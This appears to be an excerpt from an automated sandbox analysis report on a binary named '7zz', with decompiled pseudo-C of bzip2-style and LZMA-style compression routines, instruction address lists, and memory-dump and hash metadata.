																	_t235 =  *(_t523 + 0x14) - _t485;
																	__eflags = _t235;
																	 *(_t523 + 0x14) = _t235;
																	 *(_t523 + 0x10) =  *(_t523 + 0x10) - _t485;
																	if(_t235 != 0) {
																		 *(_t522 + 0x1cbc) =  *(_t523 + 0x14);
																		goto L103;
																	} else {
																		goto L97;
																	}
																}
															}
														} else {
															_t501 = _t515[8] >> 0x0000000f - _t515[9] >> 0x00000001 & 0x0000ffff;
															__eflags = _t501 -  *((intOrPtr*)(_t522 + 0xd58));
															if(_t501 >=  *((intOrPtr*)(_t522 + 0xd58))) {
																_t383 = _t522 + 0xd5c;
																_t262 = 0xa;
																__eflags = _t501 -  *((intOrPtr*)(_t522 + 0xd5c));
																 *(_t523 + 0x18) = 0xa;
																if(_t501 >=  *((intOrPtr*)(_t522 + 0xd5c))) {
																	do {
																		_t455 =  *((intOrPtr*)(_t383 + 4));
																		_t383 = _t383 + 4;
																		_t262 = _t262 + 1;
																		__eflags = _t501 - _t455;
																	} while (_t501 >= _t455);
																	goto L63;
																}
															} else {
																_t262 =  *((intOrPtr*)((_t501 >> 7) + _t522 + 0x11a0));
																L63:
																 *(_t523 + 0x18) = _t262;
															}
															_t449 = _t515[9] + _t262;
															_t515[9] = _t449;
															__eflags = _t449 - 0x10;
															if(_t449 >= 0x10) {
																do {
																	_t263 =  *_t515;
																	__eflags = _t263 - _t515[1];
																	if(_t263 < _t515[1]) {
																		_t264 = _t263 + 1;
																		__eflags = _t264;
																		 *(_t523 + 0x20) =  *_t263;
																		 *_t515 = _t264;
																	} else {
																		 *(_t523 + 0x20) = E0040E070(_t515);
																	}
																	 *(_t523 + 0x28) = E00451BF0(_t515);
																	_t394 = _t515[9] + 0xfffffff0;
																	_t515[8] = (_t515[8] << 0x00000008 |  *(_t523 + 0x28) & 0x000000ff) << 0x00000008 |  *(_t523 + 0x20) & 0x000000ff;
																	_t515[9] = _t394;
																	__eflags = _t394 - 0x10;
																} while (_t394 >= 0x10);
																_t262 =  *(_t523 + 0x18);
															}
															_t504 = (_t501 -  *((intOrPtr*)(_t522 + 0xd30 + _t262 * 4)) >> 0x10 - _t262) +  *((intOrPtr*)(_t522 + 0xd78 + _t262 * 4));
															__eflags = _t504 - 0xf9;
															if(_t504 >= 0xf9) {
																goto L101;
															} else {
																_t505 =  *((intOrPtr*)(_t522 + 0xdbc + _t504 * 4));
																__eflags = _t505 - 0xf9;
																if(_t505 >= 0xf9) {
																	goto L101;
																} else {
																	_t138 = _t523 + 0x14;
																	 *_t138 =  *(_t523 + 0x14) + _t505;
																	__eflags =  *_t138;
																	goto L73;
																}
															}
														}
													}
												}
												goto L104;
												L97:
												__eflags =  *(_t523 + 0x10);
											} while ( *(_t523 + 0x10) > 0);
											goto L98;
										}
									} else {
										if(_t332 > 0) {
											_t473 = _t522 + 8;
											_t516 = _t522 + 0x30;
											_t317 = _t332;
											do {
												_t406 =  *_t473;
												if(_t406 < _t473[1]) {
													_t282 =  *_t406;
													_t407 = _t406 + 1;
													__eflags = _t407;
													 *_t473 = _t407;
												} else {
													_t282 = E0040E070(_t473);
												}
												 *((char*)( *_t516 +  *((intOrPtr*)(_t516 + 4)))) = _t282;
												_t430 =  *((intOrPtr*)(_t516 + 4)) + 1;
												 *((intOrPtr*)(_t516 + 4)) = _t430;
												_t550 = _t430 -  *((intOrPtr*)(_t516 + 8));
												if(_t430 ==  *((intOrPtr*)(_t516 + 8))) {
													E0040EFBD(_t516, _t550);
												}
												_t317 = _t317 - 1;
											} while (_t317 != 0);
											L98:
											_t514 =  *(_t523 + 0x40);
										}
										L99:
										if(_t514 <= 0) {
											goto L103;
										} else {
											continue;
										}
									}
									goto L104;
								}
								L101:
								return 1;
							}
						}
						goto L104;
					}
					L103:
					__eflags = 0;
					return 0;
				}
				L104:
			}

0x004514f5
0x0045150c
0x00451512
0x00451515
0x00451521
0x00451526
0x00451535
0x00451541
0x00451543
0x00451543
0x0045154a
0x0045155b
0x0045155b
0x0045155c
0x00451560
0x0045154c
0x00451553
0x00451553
0x00451562
0x00451569
0x0045157a
0x0045157a
0x0045157b
0x0045157f
0x0045156b
0x00451572
0x00451572
0x004515a3
0x004515a7
0x004515aa
0x004515af
0x00451543
0x00451541
0x004515bb
0x004515bf
0x004515c6
0x004515d0
0x004515db
0x004515e2
0x004515e4
0x004515f1
0x004515f6
0x004515fb
0x0045160d
0x0045160d
0x004515f6
0x0045160f
0x00451617
0x0045161a
0x0045161d
0x00451620
0x00451625
0x00451628
0x0045162b
0x0045162b
0x004515bb
0x00451636
0x00451695
0x00000000
0x00451638
0x00451638
0x00451638
0x0045163e
0x00000000
0x00000000
0x0045164a
0x0045164f
0x00451650
0x00451655
0x00451657
0x00451657
0x00451663
0x0045166c
0x0045166f
0x00451672
0x00451674
0x00451676
0x00451676
0x00451681
0x00451682
0x00451685
0x0045168d
0x00451691
0x00000000
0x00451693
0x00451699
0x0045169b
0x00000000
0x004516a1
0x004516a1
0x004516ba
0x004516c2
0x004516c4
0x004516c6
0x004516c6
0x004516ca
0x004516cc
0x004516d7
0x004516db
0x004516df
0x0045172f
0x00451731
0x00000000
0x00451737
0x00451737
0x0045173a
0x00451751
0x00451757
0x00451759
0x00451771
0x00451777
0x00451779
0x0045177e
0x00451780
0x00451780
0x00451783
0x00451786
0x00451787
0x00451787
0x00451780
0x0045175b
0x00451762
0x00451762
0x0045178e
0x00451790
0x00451792
0x00451795
0x00451798
0x0045179a
0x0045179f
0x004517a1
0x004517b2
0x004517b2
0x004517b3
0x004517b7
0x004517a3
0x004517aa
0x004517aa
0x004517c7
0x004517e7
0x004517ea
0x004517ed
0x004517ef
0x004517f2
0x004517f2
0x00451806
0x0045180d
0x00451813
0x00451871
0x00451878
0x0045187d
0x00000000
0x0045187f
0x00451885
0x00451888
0x00451891
0x00451894
0x00451897
0x00451899
0x0045189b
0x0045189b
0x004518a0
0x00000000
0x004518a0
0x00451815
0x00451815
0x00451815
0x00451818
0x0045181b
0x00451820
0x00451822
0x00000000
0x00451828
0x0045182a
0x0045182d
0x00451830
0x00451833
0x00451836
0x0045183a
0x0045197d
0x0045197d
0x00451980
0x00451995
0x00451998
0x004519b1
0x004519b6
0x004519b6
0x0045199a
0x004519a1
0x004519a7
0x004519a7
0x004519bc
0x004519be
0x00451b2a
0x00451b2a
0x00451b40
0x00451b4f
0x00451b54
0x00451b54
0x00451b56
0x00000000
0x004519c4
0x004519c4
0x004519c7
0x00000000
0x004519cd
0x004519cd
0x004519d8
0x004519e6
0x004519e8
0x004519f1
0x004519f3
0x004519f6
0x004519f8
0x00451a01
0x00451a0e
0x00451a32
0x00451a35
0x00451a3a
0x00451a3d
0x00451a3d
0x004519f8
0x00451a48
0x00451a60
0x00451a66
0x00451a68
0x00451a80
0x00451a86
0x00451a88
0x00451a8d
0x00451a8f
0x00451a8f
0x00451a92
0x00451a95
0x00451a96
0x00451a96
0x00451a8f
0x00451a6a
0x00451a71
0x00451a71
0x00451a9d
0x00451aa1
0x00451aa4
0x00451aa7
0x00451aa9
0x00451ab2
0x00451ac2
0x00451ae2
0x00451ae5
0x00451aea
0x00451aed
0x00451aed
0x00451aa9
0x00451b04
0x00451b0b
0x00451b0e
0x00000000
0x00451b14
0x00451b14
0x00451b1b
0x00451b1e
0x00000000
0x00451b24
0x00451b24
0x00451b5a
0x00451b64
0x00451b64
0x00451b67
0x00451b6a
0x00451b6d
0x00000000
0x00451b6d
0x00451b1e
0x00451b0e
0x004519c7
0x00451982
0x00451989
0x0045198d
0x00451b70
0x00451b70
0x00451b74
0x00451b78
0x00451b7a
0x00451b7c
0x00451b7c
0x00451b81
0x00451b82
0x00451b86
0x00451b8b
0x00451b8d
0x00000000
0x00451b8f
0x00451b97
0x00451b9b
0x00451b9d
0x00451ba1
0x00451ba5
0x00451bd3
0x00000000
0x00000000
0x00000000
0x00000000
0x00451ba5
0x00451b8d
0x00451840
0x00451857
0x0045185d
0x0045185f
0x004518af
0x004518b5
0x004518ba
0x004518bc
0x004518c0
0x004518c2
0x004518c2
0x004518c5
0x004518c8
0x004518c9
0x004518c9
0x00000000
0x004518c2
0x00451861
0x00451868
0x004518cd
0x004518cd
0x004518cd
0x004518d4
0x004518d8
0x004518db
0x004518de
0x004518e0
0x004518e0
0x004518e5
0x004518e7
0x004518f8
0x004518f8
0x004518f9
0x004518fd
0x004518e9
0x004518f0
0x004518f0
0x0045190d
0x0045192d
0x00451930
0x00451935
0x00451938
0x00451938
0x0045193d
0x0045193d
0x00451953
0x0045195a
0x00451960
0x00000000
0x00451966
0x00451966
0x0045196d
0x00451973
0x00000000
0x00451979
0x00451979
0x00451979
0x00451979
0x00000000
0x00451979
0x00451973
0x00451960
0x0045183a
0x00451822
0x00000000
0x00451ba7
0x00451bab
0x00451bab
0x00000000
0x0045173a
0x004516e1
0x004516e3
0x004516e9
0x004516ec
0x004516ef
0x004516f1
0x004516f1
0x004516f8
0x00451703
0x00451705
0x00451705
0x00451706
0x004516fa
0x004516fc
0x004516fc
0x0045170d
0x00451716
0x00451719
0x0045171c
0x0045171e
0x00451722
0x00451722
0x00451727
0x00451727
0x00451bb3
0x00451bb3
0x00451bb3
0x00451bb7
0x00451bb9
0x00000000
0x00451bbb
0x00000000
0x00451bbb
0x00451bb9
0x00000000
0x004516df
0x00451bc3
0x00451bcc
0x00451bcc
0x0045169b
0x00000000
0x00451691
0x00451bdc
0x00451bdc
0x00451be2
0x00451be2
0x00000000

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf9465c887767747944f02be8cd1883d1280c098b0c5e3f404be3679971bfc79
Instruction ID: 56e6f142235e9d3d76dd4b9a838b0ae8b43fc399745457aca84a280bb1d57964
Opcode Fuzzy Hash: cf9465c887767747944f02be8cd1883d1280c098b0c5e3f404be3679971bfc79
Instruction Fuzzy Hash: 3E22C9317046458FC728CF2DC5907AA77E2AFC5305F144A2EE89AC7792D738E849CB89

Uniqueness

Uniqueness Score: -1.00%

Function 00461EF0 Relevance: .6, Instructions: 556
COMMONCrypto

Download Yara Rule

C-Code - Quality: 85%

			E00461EF0() {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t294;
				intOrPtr _t295;
				signed int _t296;
				signed int _t300;
				unsigned int _t304;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				unsigned int _t315;
				signed int _t316;
				signed int _t317;
				signed int _t318;
				signed int _t324;
				signed int _t327;
				void* _t329;
				void* _t338;
				signed int _t351;
				unsigned int _t353;
				signed int _t355;
				signed int _t356;
				unsigned int _t358;
				signed int _t360;
				unsigned int _t362;
				signed int _t364;
				signed int _t374;
				signed int _t376;
				signed int _t377;
				signed int _t380;
				signed int _t382;
				signed int _t383;
				signed int _t388;
				signed int _t390;
				signed int _t392;
				signed int _t394;
				signed int _t395;
				intOrPtr* _t398;
				signed int _t405;
				signed int _t407;
				signed int _t410;
				signed int _t411;
				signed int _t417;
				void* _t422;
				signed int _t425;
				signed int _t428;
				signed int _t438;
				signed int _t449;
				signed int _t452;
				signed int* _t459;
				signed int _t474;
				signed int _t479;
				signed int _t484;
				signed int _t500;
				unsigned int _t508;
				signed int _t510;
				signed int _t525;
				void* _t537;
				signed int _t539;
				unsigned int _t550;
				unsigned int _t553;
				unsigned int _t555;
				signed int _t562;
				signed int _t570;
				signed int _t589;
				signed short* _t604;
				unsigned int _t605;
				signed int* _t606;
				signed short* _t612;
				signed short* _t613;
				signed int* _t622;
				intOrPtr* _t624;
				void* _t625;

				_t624 =  *((intOrPtr*)(_t625 + 0x1c));
				if( *((intOrPtr*)(_t624 + 0x3bd10)) != 0) {
					 *((intOrPtr*)( *_t624))();
					 *((intOrPtr*)(_t624 + 0x3bd10)) = 0;
				}
				_t294 =  *((intOrPtr*)(_t624 + 0x3bd04));
				if( *((intOrPtr*)(_t624 + 0x3bcfc)) != 0 || _t294 != 0) {
					return _t294;
				} else {
					if( *((intOrPtr*)(_t624 + 0x3bce0)) != _t294) {
						 *((intOrPtr*)(_t624 + 0x3bd04)) = 9;
					}
					if( *((intOrPtr*)(_t624 + 0x208)) != 0) {
						 *((intOrPtr*)(_t624 + 0x3bd04)) = 8;
					}
					_t295 =  *((intOrPtr*)(_t624 + 0x3bd04));
					if(_t295 == 0) {
						_t589 =  *(_t624 + 0x3bcf0);
						__eflags = _t589 |  *(_t624 + 0x3bcf4);
						 *(_t625 + 0x10) = _t589;
						 *(_t625 + 0x18) = _t589;
						if((_t589 |  *(_t624 + 0x3bcf4)) != 0) {
							L16:
							_t296 =  *( *(_t624 + 8))(_t422);
							__eflags = _t296;
							if(_t296 == 0) {
								L82:
								_t288 = _t624 + 0x3bcf0;
								 *_t288 =  *(_t624 + 0x3bcf0) + _t589 -  *((intOrPtr*)(_t625 + 0x1c));
								__eflags =  *_t288;
								asm("adc dword [ebp+0x3bcf4], 0x0");
								return E00461A80(_t624, _t589);
							}
							while(1) {
								__eflags =  *(_t624 + 0x3bca8);
								if( *(_t624 + 0x3bca8) == 0) {
									_push(_t625 + 0x10);
									_push(_t589);
									_push(_t624);
									_t300 = E004602E0();
								} else {
									_push(_t625 + 0x10);
									_t300 = E004615B0(_t624);
								}
								_t425 =  *(_t624 + 0x325a8) &  *(_t625 + 0x14);
								 *(_t625 + 0x18) = _t300;
								 *(_t625 + 0x28) = _t425;
								__eflags = _t300 - 1;
								if(_t300 != 1) {
									goto L30;
								}
								__eflags =  *(_t625 + 0x10) - 0xffffffff;
								if( *(_t625 + 0x10) != 0xffffffff) {
									goto L30;
								} else {
									_t525 = ( *(_t624 + 0x3194c) << 4) + _t425;
									_t394 =  *(_t624 + 0x325b0 + _t525 * 2) & 0x0000ffff;
									_t606 = _t624 + 0x3bcb0;
									 *_t606 = ( *(_t624 + 0x3bcb0) >> 0xb) * _t394;
									 *(_t624 + 0x325b0 + _t525 * 2) = (0x800 - _t394 >> 5) + _t394;
									_t395 =  *_t606;
									__eflags = _t395 - 0x1000000;
									if(_t395 < 0x1000000) {
										_t405 = _t395 << 8;
										__eflags = _t405;
										 *_t606 = _t405;
										E0045F780(_t606);
									}
									_t398 =  *((intOrPtr*)( *((intOrPtr*)(_t624 + 0xc))))() -  *(_t624 + 0x31938);
									 *(_t625 + 0x28) =  *_t398;
									_t459 = _t606;
									_t537 = ((( *(_t398 - 1) & 0x000000ff) >> 8 -  *(_t624 + 0x32598)) + (( *(_t624 + 0x325a4) &  *(_t625 + 0x14)) <<  *(_t624 + 0x32598))) * 0x600 +  *((intOrPtr*)(_t624 + 0x325ac));
									__eflags =  *(_t624 + 0x3194c) - 7;
									if( *(_t624 + 0x3194c) >= 7) {
										__eflags = _t398 -  *(_t624 + 0x3193c);
										E0045FAB0( *(_t625 + 0x2c) & 0x000000ff, _t459, _t537,  *(_t398 -  *(_t624 + 0x3193c) - 1) & 0x000000ff);
									} else {
										E0045FA30( *(_t625 + 0x28) & 0x000000ff, _t459, _t537);
									}
									 *(_t624 + 0x3194c) =  *(0x47c5dc +  *(_t624 + 0x3194c) * 4);
								}
								L69:
								_t452 =  *(_t625 + 0x18);
								 *(_t624 + 0x31938) =  *(_t624 + 0x31938) - _t452;
								_t324 =  *(_t624 + 0x31938);
								 *(_t625 + 0x14) =  *(_t625 + 0x14) + _t452;
								__eflags = _t324;
								if(_t324 != 0) {
									L18:
									_t589 =  *(_t625 + 0x14);
									continue;
								}
								__eflags =  *(_t624 + 0x3bca8) - _t324;
								if( *(_t624 + 0x3bca8) == _t324) {
									__eflags =  *(_t624 + 0x3bcf8) - 0x80;
									if( *(_t624 + 0x3bcf8) >= 0x80) {
										E00461BC0(_t624);
									}
									__eflags =  *(_t624 + 0x32590) - 0x10;
									if( *(_t624 + 0x32590) >= 0x10) {
										E00461B30(_t624);
									}
								}
								_t539 =  *(_t624 + 8);
								_t327 =  *_t539();
								__eflags = _t327;
								if(_t327 == 0) {
									L81:
									_t589 =  *(_t625 + 0x14);
									goto L82;
								}
								_t329 =  *(_t625 + 0x14) -  *((intOrPtr*)(_t625 + 0x1c));
								__eflags =  *(_t625 + 0x2c);
								if( *(_t625 + 0x2c) != 0) {
									__eflags = _t329 + 0x112c -  *((intOrPtr*)(_t625 + 0x34));
									if(_t329 + 0x112c >=  *((intOrPtr*)(_t625 + 0x34))) {
										goto L81;
									}
									asm("cdq");
									asm("adc edx, [ebp+0x3bcdc]");
									asm("adc edx, [ebp+0x3bcc4]");
									_t338 =  *((intOrPtr*)(_t624 + 0x3bcc8)) -  *((intOrPtr*)(_t624 + 0x3bcd0)) +  *((intOrPtr*)(_t624 + 0x3bcd8)) +  *((intOrPtr*)(_t624 + 0x3bcc0)) + 0x2000;
									asm("adc edx, 0x0");
									__eflags = _t539;
									if(__eflags > 0) {
										goto L81;
									}
									if(__eflags < 0) {
										goto L18;
									} else {
										__eflags = _t338 -  *((intOrPtr*)(_t625 + 0x30));
										if(_t338 <  *((intOrPtr*)(_t625 + 0x30))) {
											goto L18;
										} else {
											goto L81;
										}
									}
									L85:
									_t292 = _t624 + 0x3bcf0;
									 *_t292 =  *(_t624 + 0x3bcf0) +  *(_t625 + 0x14) -  *((intOrPtr*)(_t625 + 0x1c));
									__eflags =  *_t292;
									asm("adc dword [ebp+0x3bcf4], 0x0");
									return E00461A30(_t624);
									goto L86;
								}
								__eflags = _t329 - 0x8000;
								if(_t329 < 0x8000) {
									goto L18;
								}
								goto L85;
								L30:
								_t508 =  *(_t624 + 0x3bcb0);
								_t604 = _t624 + 0x325b0 + (( *(_t624 + 0x3194c) << 4) + _t425) * 2;
								_t304 =  *_t604 & 0x0000ffff;
								_t438 = (_t508 >> 0xb) * _t304;
								 *((intOrPtr*)(_t624 + 0x3bcb8)) =  *((intOrPtr*)(_t624 + 0x3bcb8)) + _t438;
								asm("adc dword [ebp+0x3bcbc], 0x0");
								 *(_t624 + 0x3bcb0) = _t508 - _t438;
								 *_t604 = _t304 - (_t304 >> 5);
								_t306 =  *(_t624 + 0x3bcb0);
								__eflags = _t306 - 0x1000000;
								if(_t306 < 0x1000000) {
									_t392 = _t306 << 8;
									__eflags = _t392;
									 *(_t624 + 0x3bcb0) = _t392;
									E0045F780(_t624 + 0x3bcb0);
								}
								__eflags =  *(_t625 + 0x10) - 4;
								_t510 =  *(_t624 + 0x3194c);
								if( *(_t625 + 0x10) >= 4) {
									_t307 =  *(_t624 + 0x32730 + _t510 * 2) & 0x0000ffff;
									 *(_t624 + 0x3bcb0) = ( *(_t624 + 0x3bcb0) >> 0xb) * _t307;
									 *(_t624 + 0x32730 + _t510 * 2) = (0x800 - _t307 >> 5) + _t307;
									_t308 =  *(_t624 + 0x3bcb0);
									__eflags = _t308 - 0x1000000;
									if(_t308 < 0x1000000) {
										_t351 = _t308 << 8;
										__eflags = _t351;
										 *(_t624 + 0x3bcb0) = _t351;
										E0045F780(_t624 + 0x3bcb0);
									}
									__eflags =  *(_t624 + 0x3bca8);
									 *(_t624 + 0x3194c) =  *(0x47c60c +  *(_t624 + 0x3194c) * 4);
									 *(_t625 + 0x24) = 0 |  *(_t624 + 0x3bca8) == 0x00000000;
									E0045FD50(_t425, _t624 + 0x3bcb0, _t624 + 0x32c14,  *(_t625 + 0x18) + 0xfffffffe);
									__eflags =  *(_t625 + 0x20);
									if( *(_t625 + 0x20) != 0) {
										_t218 = _t624 + 0x3741c + _t425 * 4;
										 *_t218 =  *(_t624 + 0x3741c + _t425 * 4) - 1;
										__eflags =  *_t218;
										if( *_t218 == 0) {
											__eflags = _t425 * 0x440;
											L0045FE90(_t624 + 0x32c14, _t624 + 0x30ea0, _t425,  *((intOrPtr*)(_t624 + 0x37418)), _t425 * 0x440 + _t624 + 0x33018);
											 *((intOrPtr*)(_t624 + 0x3741c +  *(_t625 + 0x28) * 4)) =  *((intOrPtr*)(_t624 + 0x37418));
										}
									}
									_t315 =  *(_t625 + 0x10) - 4;
									 *(_t625 + 0x10) = _t315;
									__eflags = _t315 - 0x80;
									if(_t315 >= 0x80) {
										_t449 = ( ~(0x1ffff - _t315 >> 0x1f) & 0x0000000a) + 6;
										_t316 = _t315 >> _t449;
										__eflags = _t316;
										_t605 = ( *(_t316 + _t624 + 0x306a0) & 0x000000ff) + _t449 * 2;
									} else {
										_t605 =  *(_t315 + _t624 + 0x306a0) & 0x000000ff;
									}
									_t317 =  *(_t625 + 0x18);
									__eflags = _t317 - 5;
									if(_t317 >= 5) {
										_t318 = 3;
									} else {
										_t318 = _t317 + 0xfffffffe;
									}
									_push(_t605);
									_push(6);
									_push((_t318 << 7) + _t624 + 0x32910);
									E0045FC40(_t624 + 0x3bcb0);
									__eflags = _t605 - 4;
									if(_t605 >= 4) {
										_t343 = (_t605 >> 1) - 1;
										_t544 = (_t605 & 0x00000001 | 0x00000002) << (_t605 >> 1) - 1;
										_t428 =  *(_t625 + 0x10) - ((_t605 & 0x00000001 | 0x00000002) << (_t605 >> 1) - 1);
										__eflags = _t605 - 0xe;
										if(_t605 >= 0xe) {
											E0045F8F0(_t624 + 0x3bcb0, _t428 >> 4, _t343 + 0xfffffffc);
											E0045FCC0(4, _t624 + 0x3bcb0, _t624 + 0x32bf4, _t428 & 0x0000000f);
											_t254 = _t624 + 0x32590;
											 *_t254 =  *(_t624 + 0x32590) + 1;
											__eflags =  *_t254;
										} else {
											E0045FCC0(_t343, _t624 + 0x3bcb0, _t624 + 0x32b0e + (_t544 - _t605) * 2, _t428);
										}
									}
									_t259 = _t624 + 0x3bcf8;
									 *_t259 =  *(_t624 + 0x3bcf8) + 1;
									__eflags =  *_t259;
									 *(_t624 + 0x31948) =  *(_t624 + 0x31944);
									 *(_t624 + 0x31944) =  *(_t624 + 0x31940);
									 *(_t624 + 0x31940) =  *(_t624 + 0x3193c);
									 *(_t624 + 0x3193c) =  *(_t625 + 0x10);
								} else {
									_t353 =  *(_t624 + 0x32730 + _t510 * 2) & 0x0000ffff;
									_t550 =  *(_t624 + 0x3bcb0);
									_t474 = (_t550 >> 0xb) * _t353;
									 *((intOrPtr*)(_t624 + 0x3bcb8)) =  *((intOrPtr*)(_t624 + 0x3bcb8)) + _t474;
									asm("adc dword [ebp+0x3bcbc], 0x0");
									 *(_t624 + 0x3bcb0) = _t550 - _t474;
									 *(_t624 + 0x32730 + _t510 * 2) = _t353 - (_t353 >> 5);
									_t355 =  *(_t624 + 0x3bcb0);
									__eflags = _t355 - 0x1000000;
									if(_t355 < 0x1000000) {
										_t390 = _t355 << 8;
										__eflags = _t390;
										 *(_t624 + 0x3bcb0) = _t390;
										E0045F780(_t624 + 0x3bcb0);
									}
									_t356 =  *(_t625 + 0x10);
									__eflags = _t356;
									if(_t356 != 0) {
										_t612 = _t624 + 0x32748 +  *(_t624 + 0x3194c) * 2;
										_t358 =  *_t612 & 0x0000ffff;
										 *(_t625 + 0x20) =  *(_t624 + 0x3193c + _t356 * 4);
										_t553 =  *(_t624 + 0x3bcb0);
										_t479 = (_t553 >> 0xb) * _t358;
										 *((intOrPtr*)(_t624 + 0x3bcb8)) =  *((intOrPtr*)(_t624 + 0x3bcb8)) + _t479;
										asm("adc dword [ebp+0x3bcbc], 0x0");
										 *(_t624 + 0x3bcb0) = _t553 - _t479;
										 *_t612 = _t358 - (_t358 >> 5);
										_t360 =  *(_t624 + 0x3bcb0);
										__eflags = _t360 - 0x1000000;
										if(_t360 < 0x1000000) {
											_t380 = _t360 << 8;
											__eflags = _t380;
											 *(_t624 + 0x3bcb0) = _t380;
											E0045F780(_t624 + 0x3bcb0);
										}
										__eflags =  *(_t625 + 0x10) - 1;
										if( *(_t625 + 0x10) != 1) {
											_t555 =  *(_t624 + 0x3bcb0);
											_t613 = _t624 + 0x32760 +  *(_t624 + 0x3194c) * 2;
											_t362 =  *_t613 & 0x0000ffff;
											_t484 = (_t555 >> 0xb) * _t362;
											 *((intOrPtr*)(_t624 + 0x3bcb8)) =  *((intOrPtr*)(_t624 + 0x3bcb8)) + _t484;
											asm("adc dword [ebp+0x3bcbc], 0x0");
											 *(_t624 + 0x3bcb0) = _t555 - _t484;
											 *_t613 = _t362 - (_t362 >> 5);
											_t364 =  *(_t624 + 0x3bcb0);
											__eflags = _t364 - 0x1000000;
											if(_t364 < 0x1000000) {
												_t374 = _t364 << 8;
												__eflags = _t374;
												 *(_t624 + 0x3bcb0) = _t374;
												E0045F780(_t624 + 0x3bcb0);
											}
											E0045F9D0(_t624 + 0x3bcb0, _t624 + 0x32778 +  *(_t624 + 0x3194c) * 2,  *(_t625 + 0x10) + 0xfffffffe);
											__eflags =  *(_t625 + 0x10) - 3;
											if( *(_t625 + 0x10) == 3) {
												 *(_t624 + 0x31948) =  *(_t624 + 0x31944);
											}
											_t425 =  *(_t625 + 0x28);
											 *(_t624 + 0x31944) =  *(_t624 + 0x31940);
										} else {
											_t562 =  *(_t624 + 0x3194c);
											_t376 =  *(_t624 + 0x32760 + _t562 * 2) & 0x0000ffff;
											 *(_t624 + 0x3bcb0) = ( *(_t624 + 0x3bcb0) >> 0xb) * _t376;
											 *(_t624 + 0x32760 + _t562 * 2) = (0x800 - _t376 >> 5) + _t376;
											_t377 =  *(_t624 + 0x3bcb0);
											__eflags = _t377 - 0x1000000;
											if(_t377 < 0x1000000) {
												 *(_t624 + 0x3bcb0) = _t377 << 8;
												E0045F780(_t624 + 0x3bcb0);
											}
										}
										 *(_t624 + 0x31940) =  *(_t624 + 0x3193c);
										 *(_t624 + 0x3193c) =  *(_t625 + 0x20);
									} else {
										_t570 =  *(_t624 + 0x3194c);
										_t382 =  *(_t624 + 0x32748 + _t570 * 2) & 0x0000ffff;
										 *(_t624 + 0x3bcb0) = ( *(_t624 + 0x3bcb0) >> 0xb) * _t382;
										 *(_t624 + 0x32748 + _t570 * 2) = (0x800 - _t382 >> 5) + _t382;
										_t383 =  *(_t624 + 0x3bcb0);
										__eflags = _t383 - 0x1000000;
										if(_t383 < 0x1000000) {
											_t388 = _t383 << 8;
											__eflags = _t388;
											 *(_t624 + 0x3bcb0) = _t388;
											E0045F780(_t624 + 0x3bcb0);
										}
										__eflags =  *(_t625 + 0x18) - 1;
										E0045F9D0(_t624 + 0x3bcb0, _t624 + 0x32790 + (( *(_t624 + 0x3194c) << 4) + _t425) * 2, 0 |  *(_t625 + 0x18) != 0x00000001);
										_t425 =  *(_t625 + 0x28);
									}
									__eflags =  *(_t625 + 0x18) - 1;
									if( *(_t625 + 0x18) != 1) {
										__eflags =  *(_t624 + 0x3bca8);
										_push(0 | __eflags == 0x00000000);
										E00460070( *(_t625 + 0x18) + 0xfffffffe, _t624 + 0x3bcb0, _t425, _t624 + 0x30ea0, __eflags, _t624 + 0x3745c);
										 *(_t624 + 0x3194c) =  *(0x47c63c +  *(_t624 + 0x3194c) * 4);
									} else {
										 *(_t624 + 0x3194c) =  *(0x47c66c +  *(_t624 + 0x3194c) * 4);
									}
								}
								goto L69;
							}
						} else {
							_t407 =  *( *(_t624 + 8))();
							__eflags = _t407;
							if(_t407 != 0) {
								E004600C0(_t624, _t625 + 0x24);
								_t500 =  *(_t624 + 0x3194c) << 5;
								_t410 =  *(_t500 + _t624 + 0x325b0) & 0x0000ffff;
								_t622 = _t624 + 0x3bcb0;
								 *_t622 = ( *(_t624 + 0x3bcb0) >> 0xb) * _t410;
								 *(_t500 + _t624 + 0x325b0) = (0x800 - _t410 >> 5) + _t410;
								_t411 =  *_t622;
								__eflags = _t411 - 0x1000000;
								if(_t411 < 0x1000000) {
									_t417 = _t411 << 8;
									__eflags = _t417;
									 *_t622 = _t417;
									E0045F780(_t622);
								}
								 *(_t624 + 0x3194c) =  *(0x47c5dc +  *(_t624 + 0x3194c) * 4);
								E0045FA30( *((intOrPtr*)( *((intOrPtr*)(_t624 + 4))))() & 0x000000ff, _t622,  *((intOrPtr*)(_t624 + 0x325ac)));
								 *(_t624 + 0x31938) =  *(_t624 + 0x31938) - 1;
								_t589 = _t589 + 1;
								__eflags = _t589;
								 *(_t625 + 0x10) = _t589;
								goto L16;
							} else {
								return E00461A80(_t624, _t589);
							}
						}
					} else {
						 *((intOrPtr*)(_t624 + 0x3bcfc)) = 1;
						return _t295;
					}
				}
				L86:
			}

0x00461ef4
0x00461eff
0x00461f07
0x00461f09
0x00461f09
0x00461f1a
0x00461f20
0x0046278e
0x00461f2e
0x00461f34
0x00461f36
0x00461f36
0x00461f47
0x00461f49
0x00461f49
0x00461f53
0x00461f5b
0x00461f70
0x00461f78
0x00461f7e
0x00461f82
0x00461f86
0x00462042
0x00462049
0x0046204b
0x0046204d
0x0046276c
0x00462773
0x00462773
0x00462773
0x0046277b
0x00000000
0x00462789
0x00462064
0x00462064
0x0046206b
0x0046207f
0x00462080
0x00462081
0x00462082
0x0046206d
0x00462071
0x00462074
0x00462074
0x0046208d
0x00462091
